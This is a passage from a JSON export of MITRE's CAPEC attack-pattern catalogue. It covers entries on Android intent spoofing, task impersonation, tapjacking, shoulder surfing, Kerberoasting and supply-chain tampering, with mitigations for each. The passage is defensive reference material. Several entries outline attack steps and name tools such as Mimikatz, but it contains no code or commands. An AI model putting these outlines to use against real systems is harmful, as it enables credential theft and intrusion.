Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}],"Previous_Entry_Name":["Activity Hijack",{"Date":"2020-12-17"}]}},"502":{"ID":"502","Name":"Intent Spoof","Abstraction":"Standard","Status":"Draft","Description":"An adversary, through a previously installed malicious application, issues an intent directed toward a specific trusted application\'s component in an attempt to achieve a variety of different objectives including modification of data, information disclosure, and data injection. Components that have been unintentionally exported and made public are subject to this type of an attack. If the component trusts the intent\'s action without verififcation, then the target application performs the functionality at the adversary\'s request, helping the adversary achieve the desired negative technical impact.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"148","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":"An adversary must be able install a purpose built malicious application onto the Android device and convince the user to execute it. The malicious application will be used to issue spoofed intents."},"Mitigations":{"Mitigation":"To limit one\'s exposure to this type of attack, developers should avoid exporting components unless the component is specifically designed to handle requests from untrusted applications. Developers should be aware that declaring an intent filter will automatically export the component, exposing it to public access. Critical, state-changing actions should not be placed in exported components. If a single component handles both inter- and intra-application requests, the developer should consider dividing that component into separate components. If a component must be exported (e.g., to receive system broadcasts), then the component should dynamically check the caller\'s identity prior to performing any operations. Requiring Signature or SignatureOrSystem permissions is an effective way of limiting a component\'s exposure to a set of trusted applications. Finally, the return values of exported components can also leak private data, so developers should check the caller\'s identity prior to returning sensitive values."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"References":{"Reference":{"External_Reference_ID":"REF-427"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Description"}]}},"503":{"ID":"503","Name":"WebView Exposure","Abstraction":"Standard","Status":"Draft","Description":"An adversary, through a malicious web page, accesses application specific functionality by leveraging interfaces registered through WebView\'s addJavascriptInterface API. Once an interface is registered to WebView through addJavascriptInterface, it becomes global and all pages loaded in the WebView can call this interface.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"122","Exclude_Related":{"Exclude_ID":"515"}}},"Prerequisites":{"Prerequisite":"This type of an attack requires the adversary to convince the user to load the malicious web page inside the target application. Once loaded, the malicious web page will have the same permissions as the target application and will have access to all registered interfaces. Both the permission and the interface must be in place for the functionality to be exposed."},"Mitigations":{"Mitigation":"To mitigate this type of an attack, an application should limit permissions to only those required and should verify the origin of all web content it loads."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"References":{"Reference":{"External_Reference_ID":"REF-430"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"504":{"ID":"504","Name":"Task Impersonation","Abstraction":"Standard","Status":"Stable","Description":"An adversary, through a previously installed malicious application, impersonates an expected or routine task in an attempt to steal sensitive information or leverage a user\'s privileges. When impersonating an expected task, the adversary monitors the task list maintained by the operating system and waits for a specific legitimate task to become active. Once the task is detected, the malicious application launches a new task in the foreground that mimics the user interface of the legitimate task. At this point, the user thinks that they are interacting with the legitimate task that they started, but instead they are interacting with the malicious application. Once the adversary\'s goal is reached, the malicious application can exit, leaving the original trusted application visible and the appearance that nothing out of the ordinary has occurred. A second approach entails the adversary impersonating an unexpected task, but one that may often be spawned by legitimate background processes. For example, an adversary may randomly impersonate a system credential prompt, implying that a background process requires authentication for some purpose. The user, believing they are interacting with a legitimate task, enters their credentials or authorizes the use of their stored credentials, which the adversary then leverages for nefarious purposes. This type of attack is most often used to obtain sensitive information (e.g., credentials) from the user, but may also be used to ride the user\'s privileges.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"173","Exclude_Related":{"Exclude_ID":"403"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine suitable tasks to exploit] Determine what tasks exist on the target system that may result in a user providing sensitive information.","Technique":["Determine what tasks prompt a user for their credentials.","Determine what tasks may prompt a user to authorize a process to execute with elevated privileges."]},{"Step":"2","Phase":"Exploit","Description":"[Impersonate Task] Impersonate a legitimate task, either expected or unexpected, in an attempt to gain user credentials or to ride the user\'s privileges.","Technique":["Prompt a user for their credentials, while making the user believe the credential request is legitimate.","Prompt a user to authorize a task to run with elevated privileges, while making the user believe the request is legitimate."]}]},"Prerequisites":{"Prerequisite":["The adversary must already have access to the target system via some means.","A legitimate task must exist that an adversary can impersonate to glean credentials.","The user\'s privileges allow them to execute certain tasks with elevated privileges."]},"Skills_Required":{"Skill":["Once an adversary has gained access to the target system, impersonating a task is trivial.",{"Level":"Low"}]},"Resources_Required":{"Resource":["Malware or some other means to initially comprise the target system.","Additional malware to impersonate a legitimate task."]},"Indicators":{"Indicator":"Credential or permission elevation prompts that appear illegitimate or unexpected."},"Consequences":{"Consequence":{"Scope":["Access Control","Authentication"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":"The only known mitigation to this attack is to avoid installing the malicious application on the device. However, to impersonate a running task the malicious application does need the GET_TASKS permission to be able to query the task list, and being suspicious of applications with that permission can help."},"Example_Instances":{"Example":["An adversary monitors the system task list for Microsoft Outlook in an attempt to determine when the application may prompt the user to enter their credentials to view encrypted email. Once the task is executed, the adversary impersonates the credential prompt to obtain the user\'s Microsoft Outlook encryption credentials. These credentials can then be leveraged by the adversary to read a user\'s encrypted email.","An adversary prompts a user to authorize an elevation of privileges, implying that a background task needs additional permissions to execute. The user accepts the privilege elevation, allowing the adversary to execute additional malware or tasks with the user\'s privileges."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"1021"}},"References":{"Reference":{"External_Reference_ID":"REF-434","Section":"4.1.2 Man-In-The-Middle"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Abstraction, @Status, Consequences, Description, Example_Instances, Execution_Flow, Indicators, Likelihood_Of_Attack, Mitigations, Prerequisites, Resources_Required, Skills_Required, Typical_Severity"}]}},"505":{"ID":"505","Name":"Scheme Squatting","Abstraction":"Detailed","Status":"Draft","Description":"An adversary, through a previously installed malicious application, registers for a URL scheme intended for a target application that has not been installed. Thereafter, messages intended for the target application are handled by the malicious application. Upon receiving a message, the malicious application displays a screen that mimics the target application, thereby convincing the user to enter sensitive information. This type of attack is most often used to obtain sensitive information (e.g., credentials) from the user as they think that they are interacting with the intended target application.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"616","Exclude_Related":[{"Exclude_ID":"513"},{"Exclude_ID":"515"},{"Exclude_ID":"512"}]}},"Mitigations":{"Mitigation":"The only known mitigation to this attack is to avoid installing the malicious application on the device. Applications usually have to declare the schemes they wish to register, so detecting this during a review is feasible."},"References":{"Reference":{"External_Reference_ID":"REF-434","Section":"4.1.2 Man-In-The-Middle"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"506":{"ID":"506","Name":"Tapjacking","Abstraction":"Standard","Status":"Draft","Description":"An adversary, through a previously installed malicious application, displays an interface that misleads the user and convinces them to tap on an attacker desired location on the screen. This is often accomplished by overlaying one screen on top of another while giving the appearance of a single interface. There are two main techniques used to accomplish this. The first is to leverage transparent properties that allow taps on the screen to pass through the visible application to an application running in the background. The second is to strategically place a small object (e.g., a button or text field) on top of the visible screen and make it appear to be a part of the underlying application. In both cases, the user is convinced to tap on the screen but does not realize the application that they are interacting with.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"173","Exclude_Related":{"Exclude_ID":"403"}}},"Prerequisites":{"Prerequisite":"This pattern of attack requires the ability to execute a malicious application on the user\'s device. This malicious application is used to present the interface to the user and make the attack possible."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"1021"}},"References":{"Reference":[{"External_Reference_ID":"REF-436","Section":"4. New Browserless Attacks"},{"External_Reference_ID":"REF-437"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description"}]}},"507":{"ID":"507","Name":"Physical Theft","Abstraction":"Meta","Status":"Draft","Description":"An adversary gains physical access to a system or device through theft of the item. Possession of a system or device enables a number of unique attacks to be executed and often provides the adversary with an extended timeframe for which to perform an attack. Most protections put in place to secure sensitive information can be defeated when an adversary has physical access and enough time.","Prerequisites":{"Prerequisite":"This type of attack requires the existence of a physical target that an adversary believes hosts something of value."},"Mitigations":{"Mitigation":"To mitigate this type of attack, physical security techniques such as locks doors, alarms, and monitoring of targets should be implemented."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"508":{"ID":"508","Name":"Shoulder Surfing","Abstraction":"Detailed","Status":"Draft","Description":"In a shoulder surfing attack, an adversary observes an unaware individual\'s keystrokes, screen content, or conversations with the goal of obtaining sensitive information. One motive for this attack is to obtain sensitive information about the target for financial, personal, political, or other gains. From an insider threat perspective, an additional motive could be to obtain system/application credentials or cryptographic keys. Shoulder surfing attacks are accomplished by observing the content \\"over the victim\'s shoulder\\", as implied by the name of this attack.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"651","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"513"}]},{"Nature":"CanPrecede","CAPEC_ID":"560"}]},"Prerequisites":{"Prerequisite":"The adversary typically requires physical proximity to the target\'s environment, in order to observe their screen or conversation. This may not be the case if the adversary is able to record the target and obtain sensitive information upon review of the recording."},"Skills_Required":{"Skill":["In most cases, an adversary can simply observe and retain the desired information.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Likelihood":"High"}},"Mitigations":{"Mitigation":["Be mindful of your surroundings when discussing or viewing sensitive information in public areas.","Pertaining to insider threats, ensure that sensitive information is not displayed to nor discussed around individuals without need-to-know access to said information."]},"Example_Instances":{"Example":["An adversary can capture a target\'s banking credentials and transfer money to adversary-controlled accounts.","An adversary observes the target\'s mobile device lock screen pattern/passcode and then steals the device, which can now be unlocked.","An insider could obtain database credentials for an application and sell the credentials on the black market.","An insider overhears a conversation pertaining to classified information, which could then be posted on an anonymous online forum."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"200"},{"CWE_ID":"359"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2020-07-30"}}},"509":{"ID":"509","Name":"Kerberoasting","Abstraction":"Detailed","Status":"Stable","Description":"Through the exploitation of how service accounts leverage Kerberos authentication with Service Principal Names (SPNs), the adversary obtains and subsequently cracks the hashed credentials of a service account target to exploit its privileges. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. As an authenticated user, the adversary may request Active Directory and obtain a service ticket with portions encrypted via RC4 with the private key of the authenticated account. By extracting the local ticket and saving it disk, the adversary can brute force the hashed value to reveal the target account credentials.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"652"},{"Nature":"CanPrecede","CAPEC_ID":"151"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"Scan for user accounts with set SPN values","Technique":"These can be found via Powershell or LDAP queries, as well as enumerating startup name accounts and other means."},{"Step":"2","Phase":"Explore","Description":"Request service tickets","Technique":"Using user account\'s SPN value, request other service tickets from Active Directory"},{"Step":"3","Phase":"Experiment","Description":"Extract ticket and save to disk","Technique":"Certain tools like Mimikatz can extract local tickets and save them to memory/disk."},{"Step":"4","Phase":"Exploit","Description":"Crack the encrypted ticket to harvest plain text credentials","Technique":"Leverage a brute force application/script on the hashed value offline until cracked. The shorter the password, the easier it is to crack."}]},"Prerequisites":{"Prerequisite":["The adversary requires access as an authenticated user on the system. This attack pattern relates to elevating privileges.","The adversary requires use of a third-party credential harvesting tool (e.g., Mimikatz).","The adversary requires a brute force tool."]},"Skills_Required":{"Skill":{"Level":"Medium"}},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":["Monitor system and domain logs for abnormal access.","Employ a robust password policy for service accounts. Passwords should be of adequate length and complexity, and they should expire after a period of time.","Employ the principle of least privilege: limit service accounts privileges to what is required for functionality and no more.","Enable AES Kerberos encryption (or another stronger encryption algorithm), rather than RC4, where possible."]},"Example_Instances":{"Example":"PowerSploit\'s Invoke-Kerberoast module can be leveraged to request Ticket Granting Service (TGS) tickets and return crackable ticket hashes. [REF-585] [REF-586]"},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"522"},{"CWE_ID":"308"},{"CWE_ID":"309"},{"CWE_ID":"294"},{"CWE_ID":"263"},{"CWE_ID":"262"},{"CWE_ID":"521"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1558.003","Entry_Name":"Steal or Forge Kerberos Tickets:Kerberoasting"}},"References":{"Reference":[{"External_Reference_ID":"REF-559"},{"External_Reference_ID":"REF-585"},{"External_Reference_ID":"REF-586"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2019-04-04"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Status, Example_Instances, References, Related_Attack_Patterns, Related_Weaknesses, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Execution_Flow"}]}},"510":{"ID":"510","Name":"SaaS User Request Forgery","Abstraction":"Standard","Status":"Draft","Description":"An adversary, through a previously installed malicious application, performs malicious actions against a third-party Software as a Service (SaaS) application (also known as a cloud based application) by leveraging the persistent and implicit trust placed on a trusted user\'s session. This attack is executed after a trusted user is authenticated into a cloud service, \\"piggy-backing\\" on the authenticated session, and exploiting the fact that the cloud service believes it is only interacting with the trusted user. If successful, the actions embedded in the malicious application will be processed and accepted by the targeted SaaS application and executed at the trusted user\'s privilege level.","Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"21"}},"Prerequisites":{"Prerequisite":"An adversary must be able install a purpose built malicious application onto the trusted user\'s system and convince the user to execute it while authenticated to the SaaS application."},"Skills_Required":{"Skill":["This attack pattern often requires the technical ability to modify a malicious software package (e.g. Zeus) to spider a targeted site and a way to trick a user into a malicious software download.",{"Level":"Medium"}]},"Mitigations":{"Mitigation":["To limit one\'s exposure to this type of attack, tunnel communications through a secure proxy service.","Detection of this type of attack can be done through heuristic analysis of behavioral anomalies (a la credit card fraud detection) which can be used to identify inhuman behavioral patterns. (e.g., spidering)"]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"346"}},"References":{"Reference":{"External_Reference_ID":"REF-438"}},"Notes":{"Note":["SaaS/Cloud applications are often accessed from unmanaged systems and devices, over untrusted networks that are outside corporate IT control. The likelihood of a cloud service being accessed by a trusted user though an untrusted device is high. Several instances of this style of attack have been found.",{"Type":"Other"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"511":{"ID":"511","Name":"Infiltration of Software Development Environment","Abstraction":"Detailed","Status":"Draft","Description":"An attacker uses common delivery mechanisms such as email attachments or removable media to infiltrate the IDE (Integrated Development Environment) of a victim manufacturer with the intent of implanting malware allowing for attack control of the victim IDE environment. The attack then uses this access to exfiltrate sensitive data or information, manipulate said data or information, and conceal these actions. This will allow and aid the attack to meet the goal of future compromise of a recipient of the victim\'s manufactured product further down in the supply chain.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"444","Exclude_Related":[{"Exclude_ID":"513"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":["The victim must use email or removable media from systems running the IDE (or systems adjacent to the IDE systems).","The victim must have a system running exploitable applications and/or a vulnerable configuration to allow for initial infiltration.","The attacker must have working knowledge of some if not all of the components involved in the IDE system as well as the infrastructure."]},"Skills_Required":{"Skill":["Intelligence about the manufacturer\'s operating environment and infrastructure.",{"Level":"Medium"},"Ability to develop, deploy, and maintain a stealth malicious backdoor program remotely in what is essentially a hostile environment.",{"Level":"High"},"Development skills to construct malicious attachments that can be used to exploit vulnerabilities in typical desktop applications or system configurations. The malicious attachments should be crafted well enough to bypass typical defensive systems (IDS, anti-virus, etc)",{"Level":"High"}]},"Example_Instances":{"Example":"The attacker, knowing the victim runs email on a system adjacent to the IDE system, sends a phishing email with a malicious attachment to the victim. When viewed, the malicious attachment installs a backdoor that allows the attacker to remotely compromise the adjacent IDE system from the victim\'s workstation. The attacker is then able to exfiltrate sensitive data about the software being developed on the IDE system."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"516":{"ID":"516","Name":"Hardware Component Substitution During Baselining","Abstraction":"Detailed","Status":"Draft","Description":"An attacker with access to system components during allocated baseline development can substitute a maliciously altered hardware component for a baseline component in the during the product development and research phase. This can lead to adjustments and calibrations being made in the product, so that when the final product with the proper components is deployed, it will not perform as designed and be advantageous to the attacker.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"444","Exclude_Related":{"Exclude_ID":"513"}}},"Prerequisites":{"Prerequisite":"The attacker will need either physical access or be able to supply malicious hardware components to the product development facility."},"Skills_Required":{"Skill":["Intelligence data on victim\'s purchasing habits.",{"Level":"Medium"},"Resources to maliciously construct/alter hardware components used for testing by the supplier.",{"Level":"High"},"Resources to physically infiltrate supplier.",{"Level":"High"}]},"Example_Instances":{"Example":"An attacker supplies the product development facility of a network security device with a hardware component that is used to simulate large volumes of network traffic. The device claims in logs, stats, and via the display panel to be pumping out very large quantities of network traffic, when it is in fact putting out very low volumes. The developed product is adjusted and configured to handle the what it believes to be a heavy network load, but when deployed at the victim site the large volumes of network traffic are dropped instead of being processed by the network security device. This allows the attacker an advantage when attacking the victim in that the attacker\'s presence may not be detected by the device."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Examples-Instances, Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"517":{"ID":"517","Name":"Documentation Alteration to Circumvent Dial-down","Abstraction":"Detailed","Status":"Draft","Description":"An attacker with access to a manufacturer\'s documentation, which include descriptions of advanced technology and/or specific components\' criticality, alters the documents to circumvent dial-down functionality requirements. This alteration would change the interpretation of implementation and manufacturing techniques, allowing for advanced technologies to remain in place even though these technologies might be restricted to certain customers, such as nations on the terrorist watch list, giving the attacker on the receiving end of a shipped product access to an advanced technology that might otherwise be restricted.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"447","Exclude_Related":[{"Exclude_ID":"513"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":["Advanced knowledge of internal software and hardware components within manufacturer\'s development environment.","Access to the manufacturer\'s documentation."]},"Skills_Required":{"Skill":["Ability to read, interpret, and subsequently alter manufacturer\'s documentation to prevent dial-down capabilities.",{"Level":"High"},"Ability to stealthly gain access via remote compromise or physical access to the manufacturer\'s documentation.",{"Level":"High"}]},"Example_Instances":{"Example":"A product for manufacture exists that contains advanced cryptographic capabilities, including algorithms that are restricted from being shipped to some nations. An attacker from one of the restricted nations alters the documentation to ensure that when the product is manufactured for shipment to a restricted nation, the software compilation steps that normally would prevent the advanced cryptographic capabilities from being included are actually included. When the product is shipped to the attacker\'s home country, the attacker is able to retrieve and/or use the advanced cryptographic capabilities."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"518":{"ID":"518","Name":"Documentation Alteration to Produce Under-performing Systems","Abstraction":"Detailed","Status":"Draft","Description":"An attacker with access to a manufacturer\'s documentation alters the descriptions of system capabilities with the intent of causing errors in derived system requirements, impacting the overall effectiveness and capability of the system, allowing an attacker to take advantage of the introduced system capability flaw once the system is deployed.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"447","Exclude_Related":[{"Exclude_ID":"513"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":["Advanced knowledge of software and hardware capabilities of a manufacturer\'s product.","Access to the manufacturer\'s documentation."]},"Skills_Required":{"Skill":["Ability to read, interpret, and subsequently alter manufacturer\'s documentation to misrepresent system capabilities.",{"Level":"High"},"Ability to stealthly gain access via remote compromise or physical access to the manufacturer\'s documentation.",{"Level":"High"}]},"Example_Instances":{"Example":"A security subsystem involving encryption is a part of a product, but due to the demands of this subsystem during operation, the subsystem only runs when a specific amount of memory and processing is available. An attacker alters the descriptions of the system capabilities so that when deployed with the minimal requirements at the victim location, the encryption subsystem is never operational, leaving the system in a weakened security state."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"519":{"ID":"519","Name":"Documentation Alteration to Cause Errors in System Design","Abstraction":"Detailed","Status":"Draft","Description":"An attacker with access to a manufacturer\'s documentation containing requirements allocation and software design processes maliciously alters the documentation in order to cause errors in system design. This allows the attacker to take advantage of a weakness in a deployed system of the manufacturer for malicious purposes.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"447","Exclude_Related":[{"Exclude_ID":"513"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":["Advanced knowledge of software capabilities of a manufacturer\'s product.","Access to the manufacturer\'s documentation."]},"Skills_Required":{"Skill":["Ability to read, interpret, and subsequently alter manufacturer\'s documentation to cause errors in system design.",{"Level":"High"},"Ability to stealthly gain access via remote compromise or physical access to the manufacturer\'s documentation.",{"Level":"High"}]},"Example_Instances":{"Example":"During operation, a firewall will restart various subsystems to reload and implement new rules as added by the user. An attacker alters the software design dependencies in the manufacturer\'s documentation so that under certain predictable conditions the reload will fail to load in rules resulting in a \\"fail open\\" state. Once deployed at a victim site, this will allow the attacker to bypass the victim\'s firewall."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"520":{"ID":"520","Name":"Counterfeit Hardware Component Inserted During Product Assembly","Abstraction":"Detailed","Status":"Draft","Description":"An attacker with either direct access to the product assembly process or to the supply of subcomponents used in the product assembly process introduces counterfeit hardware components into product assembly. The assembly containing the counterfeit components results in a system specifically designed for malicious purposes.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"444","Exclude_Related":[{"Exclude_ID":"513"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":"The attacker will need either physical access or be able to supply malicious hardware components to the product development facility."},"Skills_Required":{"Skill":["Resources to maliciously construct components used by the manufacturer.",{"Level":"High"},"Resources to physically infiltrate manufacturer or manufacturer\'s supplier.",{"Level":"High"}]},"Example_Instances":{"Example":"A manufacturer of a firewall system requires a hardware card which functions as a multi-jack ethernet card with four ethernet ports. The attacker constructs a counterfeit card that functions normally except that packets from the attacker\'s network are allowed to bypass firewall processing completely. Once deployed at a victim location, this allows the attacker to bypass the firewall unrestricted."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE 